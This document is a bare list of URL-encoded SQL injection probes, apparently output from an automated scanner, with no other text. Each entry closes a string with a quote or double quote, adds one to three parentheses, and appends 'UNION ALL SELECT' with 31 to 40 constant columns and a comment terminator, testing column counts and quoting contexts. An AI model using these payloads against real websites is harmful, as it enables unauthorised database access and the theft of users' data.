-6250%27%20UNION%20ALL%20SELECT%201225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%23 -4498%27%20UNION%20ALL%20SELECT%207543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%23 -8058%27%20UNION%20ALL%20SELECT%202651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%2C2651%23 -3121%27%20UNION%20ALL%20SELECT%203992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%23 -8415%27%20UNION%20ALL%20SELECT%203101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%23 -3777%27%20UNION%20ALL%20SELECT%204681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%23 -5567%27%20UNION%20ALL%20SELECT%202285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%23 -3644%27%20UNION%20ALL%20SELECT%205604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%23 -8460%27%29%20UNION%20ALL%20SELECT%205416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%2C5416%23 -5357%27%29%20UNION%20ALL%20SELECT%204354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%23 -2576%27%29%20UNION%20ALL%20SELECT%204637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%2C4637%23 -3962%27%29%20UNION%20ALL%20SELECT%206771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%23 -5671%27%29%20UNION%20ALL%20SELECT%209519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%2C9519%23 -6756%27%29%20UNION%20ALL%20SELECT%208429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%2C8429%23 -4428%27%29%20UNION%20ALL%20SELECT%206289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%2C6289%23 -9115%27%29%20UNION%20ALL%20SELECT%207200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%2C7200%23 -1790%27%29%20UNION%20ALL%20SELECT%201405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%23 -6261%27%29%20UNION%20ALL%20SELECT%208898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%23 -6430%27%29%29%20UNION%20ALL%20SELECT%209924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%23 -1971%27%29%29%20UNION%20ALL%20SELECT%205409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%23 -7098%27%29%29%20UNION%20ALL%20SELECT%207802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%2C7802%23 -6575%27%29%29%20UNION%20ALL%20SELECT%206348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%23 -7055%27%29%29%20UNION%20ALL%20SELECT%208948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%23 -4151%27%29%29%20UNION%20ALL%20SELECT%204727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%2C4727%23 -2559%27%29%29%20UNION%20ALL%20SELECT%201709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%23 -1347%27%29%29%20UNION%20ALL%20SELECT%205168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%23 -7197%27%29%29%20UNION%20ALL%20SELECT%203488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%2C3488%23 -7548%27%29%29%20UNION%20ALL%20SELECT%204606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%2C4606%23 -3676%27%29%29%29%20UNION%20ALL%20SELECT%208769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%23 -1676%27%29%29%29%20UNION%20ALL%20SELECT%201312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%23 -6998%27%29%29%29%20UNION%20ALL%20SELECT%208156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%23 -2447%27%29%29%29%20UNION%20ALL%20SELECT%204823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%23 -6843%27%29%29%29%20UNION%20ALL%20SELECT%205664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%23 -6615%27%29%29%29%20UNION%20ALL%20SELECT%209096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%23 -2816%27%29%29%29%20UNION%20ALL%20SELECT%202674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%2C2674%23 -5246%27%29%29%29%20UNION%20ALL%20SELECT%206619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%23 -9788%27%29%29%29%20UNION%20ALL%20SELECT%208286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%23 -8950%27%29%29%29%20UNION%20ALL%20SELECT%204412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%23 -1541%27%20UNION%20ALL%20SELECT%207222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%2C7222%23 -1607%27%20UNION%20ALL%20SELECT%202952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952%23 -2591%27%20UNION%20ALL%20SELECT%201026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%2C1026%23 -2048%27%20UNION%20ALL%20SELECT%209127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%23 -7085%27%20UNION%20ALL%20SELECT%206802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%23 -6030%27%20UNION%20ALL%20SELECT%202820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%23 -4701%27%20UNION%20ALL%20SELECT%209223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%23 -1570%27%20UNION%20ALL%20SELECT%201767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%2C1767%23 -4847%27%20UNION%20ALL%20SELECT%206459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%23 -9857%27%20UNION%20ALL%20SELECT%208548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%23 -6553%22%29%20UNION%20ALL%20SELECT%207111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%2C7111%23 -5073%22%29%20UNION%20ALL%20SELECT%203283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%2C3283%23 -7238%22%29%20UNION%20ALL%20SELECT%205684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%23 -4301%22%29%20UNION%20ALL%20SELECT%209070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%23 -6511%22%29%20UNION%20ALL%20SELECT%202065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%23 -9068%22%29%20UNION%20ALL%20SELECT%209701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%23 -9402%22%29%20UNION%20ALL%20SELECT%209291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%23 -4537%22%29%20UNION%20ALL%20SELECT%204094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%2C4094%23 -9883%22%29%20UNION%20ALL%20SELECT%203950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%23 -9143%22%29%20UNION%20ALL%20SELECT%205227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%2C5227%23 -1504%22%29%29%20UNION%20ALL%20SELECT%204290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%2C4290%23 -6327%22%29%29%20UNION%20ALL%20SELECT%207233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%2C7233%23 -1468%22%29%29%20UNION%20ALL%20SELECT%201836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%23 -9160%22%29%29%20UNION%20ALL%20SELECT%209847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%2C9847%23 -6657%22%29%29%20UNION%20ALL%20SELECT%203139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%23 -5646%22%29%29%20UNION%20ALL%20SELECT%205325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%23 -2050%22%29%29%20UNION%20ALL%20SELECT%202714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%23 -2768%22%29%29%20UNION%20ALL%20SELECT%203826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%23 -1865%22%29%29%20UNION%20ALL%20SELECT%209275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%2C9275%23 -2251%22%29%29%20UNION%20ALL%20SELECT%206179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%2C6179%23 -4423%22%29%29%29%20UNION%20ALL%20SELECT%208598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%23 -2873%22%29%29%29%20UNION%20ALL%20SELECT%205962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%23 -7752%22%29%29%29%20UNION%20ALL%20SELECT%204893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%23 -6725%22%29%29%29%20UNION%20ALL%20SELECT%204639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%2C4639%23 -5418%22%29%29%29%20UNION%20ALL%20SELECT%207445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%2C7445%23 -5981%22%29%29%29%20UNION%20ALL%20SELECT%203638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%2C3638%23 